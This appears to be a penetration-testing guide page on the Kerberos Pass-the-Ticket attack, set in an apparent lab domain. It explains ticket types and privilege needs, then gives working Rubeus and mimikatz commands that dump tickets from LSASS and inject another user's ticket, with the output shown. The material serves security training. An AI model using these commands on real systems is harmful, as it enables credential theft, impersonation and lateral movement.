# Pass-the-Ticket

The Pass-the-Ticket (PtT) attack reuses Kerberos tickets taken from one logon session to authenticate from another, impersonating the ticket's owner against network resources. A TGT is used to request service tickets (TGS) from the KDC and lives in the logon session it was issued to; a TGS is issued for one specific service. **Both kinds of ticket can be extracted from memory and injected into another session. A TGS is the narrower artifact: it only grants access to the service it names, for as long as the ticket is valid, whereas a TGT can be used to request tickets for any service.**

The core premise is simple: an attacker extracts a valid TGS from LSASS, injects it into their current session, and accesses the corresponding service as the impersonated user. If the ticket belongs to the attacker's own logon session, no administrative privileges are needed to read it; tickets held in other users' sessions require local administrator rights (`SeDebugPrivilege` for mimikatz's `sekurlsa::` commands, elevation for Rubeus `/luid`). This enables lateral movement without dumping password hashes, and, when tickets are retrieved through the LSA API rather than by reading process memory, without opening a handle to LSASS at all, which reduces detection opportunities.

However, careless ticket injection can disrupt existing authentication contexts. **If a ticket is injected into an active logon session rather than an isolated one, it may overwrite the Kerberos ticket that session already holds for the same client or service.** For example, if the computer account (`<HOSTNAME>$`, which backs the SYSTEM logon session) loses its TGT this way, it may not obtain a new one until the system is rebooted. Likewise, if a service account's ticket is overwritten, the service may fail to authenticate until it is restarted or the machine reboots.

To avoid this, operators create a **sacrificial process**: a process started under a new logon session, so that the injected ticket lives there and nothing else on the host is affected. Creating the logon session itself does not require local administrator rights; Rubeus `createnetonly` and `runas /netonly` both use a `NetOnly` (new-credentials) logon that any user can perform. What does require elevation is reading tickets from, or injecting tickets into, a logon session other than your own (Rubeus `/luid:`, mimikatz `sekurlsa::`), which the full workflow below relies on. Command and control frameworks such as Covenant and Cobalt Strike expose the same idea through built-ins such as `maketoken` (`make_token` in Cobalt Strike), which create the fresh logon session inside the implant without spawning a separate process.

{% code overflow="wrap" %}

```powershell
# Create a sacrificial process under a new NetOnly logon session (/show displays it instead of hiding it)
.\Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show

# List the tickets visible from this context: every logon session when elevated, only your own otherwise
.\Rubeus.exe triage

# Extract the TGT (service krbtgt) from the target logon session; /luid requires elevation
.\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap

# Renew the dumped TGT and pass it into the current logon session (/ptt); run this from inside the sacrificial process
.\Rubeus.exe renew /ticket:doIFVjCCBVKgAwIBBaEDA<SNIP> /ptt
```

{% endcode %}

In the example below, `dave` has access to the `backup` share on `WEB04`, but the compromised user, `jen`, does not.

```powershell
# Check jen's permissions
> whoami
corp\jen
> ls \\web04\backup
ls : Access to the path '\\web04\backup' is denied.
```

First, extract all tickets from LSASS with `mimikatz`. `sekurlsa::tickets /export` writes every ticket it finds to a `.kirbi` file; this reads LSASS memory, so it needs `privilege::debug` (local administrator).

```powershell
# Dump tickets from LSASS (privilege::debug enables SeDebugPrivilege; requires local administrator)
mimikatz # privilege::debug
mimikatz # sekurlsa::tickets /export
...
Saved to file [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
```

We can inspect the dumped ticket files and confirm that a TGS for `dave` to `cifs/web04` exists. mimikatz encodes the logon session ID (`[0;12bd0]`), the ticket flags (`40810000`, the same value `klist` shows later) and `client@service` in the file name, so the listing alone identifies the ticket we want.

{% code overflow="wrap" %}

```powershell
> dir *.kirbi
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/14/2022   6:24 AM           1561 [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
...
```

{% endcode %}

We can then inject `dave`'s `cifs/web04` TGS into `jen`'s session in order to access the `backup` share. Note that this injects into `jen`'s existing logon session rather than a sacrificial one, so it is subject to the overwrite caveat above; here `jen` holds no ticket for `cifs/web04`, so nothing is displaced, and `klist` afterwards shows only the injected ticket.

```powershell
# Inject dave's TGS into jen's session
mimikatz # kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi

# List the cached tickets
> klist
...
Cached Tickets: (1)

#0>     Client: dave @ CORP.COM
        Server: cifs/web04 @ CORP.COM
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40810000 -> forwardable renewable name_canonicalize
        Start Time: 9/14/2022 5:31:32 (local)
        End Time:   9/14/2022 15:31:13 (local)
        Renew Time: 9/21/2022 5:31:13 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

# Confirm access
> ls \\web04\backup
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2022   2:52 AM              0 backup_schemata.txt
```
